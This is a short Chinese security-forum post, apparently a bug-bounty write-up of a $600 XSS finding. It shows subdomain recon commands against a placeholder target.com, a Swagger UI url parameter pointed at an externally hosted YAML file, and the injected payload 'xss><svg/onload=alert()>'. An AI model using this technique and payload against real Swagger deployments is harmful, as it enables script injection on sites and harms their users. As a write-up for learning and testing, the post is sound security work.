安全矩阵

 找回密码
 立即注册
搜索
查看: 970|回复: 0

一处价值600美刀的xss

[复制链接]

179

主题

179

帖子

630

积分

高级会员

Rank: 4

积分
630
发表于 2023-10-22 15:00:27 | 显示全部楼层 |阅读模式
一处价值600美刀的xss
正文
目标为target.com

信息搜集:

  1. subfinder -d target.com -silent -o list.txt
  2. httpx -l list.txt -sc — title > httpx_target.txt
复制代码



发现某个子域名https://subdomain.target.com重定向至4343端口,并显示连接超时,

对其暴力破解,发现一个接口 https://subdomain.target.com/api/

发现其使用的是 Swagger(开发者一般使用其作为接口文档使用),准备测试 XSS

  1. https://subdomain.target.com/api/index.html?url=https://jumpy-floor.surge.sh/test.yaml
复制代码



注入url参数<h1>Hello</h1>,结果显示的是Hello,故这里有html注入,注入xss的payload: url=”xss><svg/onload=alert()>

发现弹窗!


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 06:30 , Processed in 0.015558 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表